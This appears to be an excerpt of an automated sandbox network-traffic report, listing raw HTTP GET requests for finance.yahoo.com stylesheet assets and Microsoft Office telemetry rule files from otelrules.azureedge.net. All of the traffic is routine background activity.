Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PositionDeleteMessage.B-8pT6wm.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/ErrorMsg.CmzKsgiD.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Logo.BwBAfWlF.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Card.CXxu1kiL.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Image.BjjiB67D.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/FeatureBarNeo.CGHKwr-8.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Layout.Cie9yXEc.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Footer.BvGH1Mdb.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MarketsNavBar.CIf_21Zk.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/NavBar.CJPoP-H9.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/82.F1CMla6e.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MarketsTableWrapper.tnvUOp-A.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/DataTable.DTaxQPTv.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PortfolioNameHeader.BeM8jDG1.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StatusTag.CEoB-Y-F.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StarRating.BsIEvvGF.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/CompanyName.pMjzS6-j.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Ticker.Cs267Y2O.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Table.BF6icsxP.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
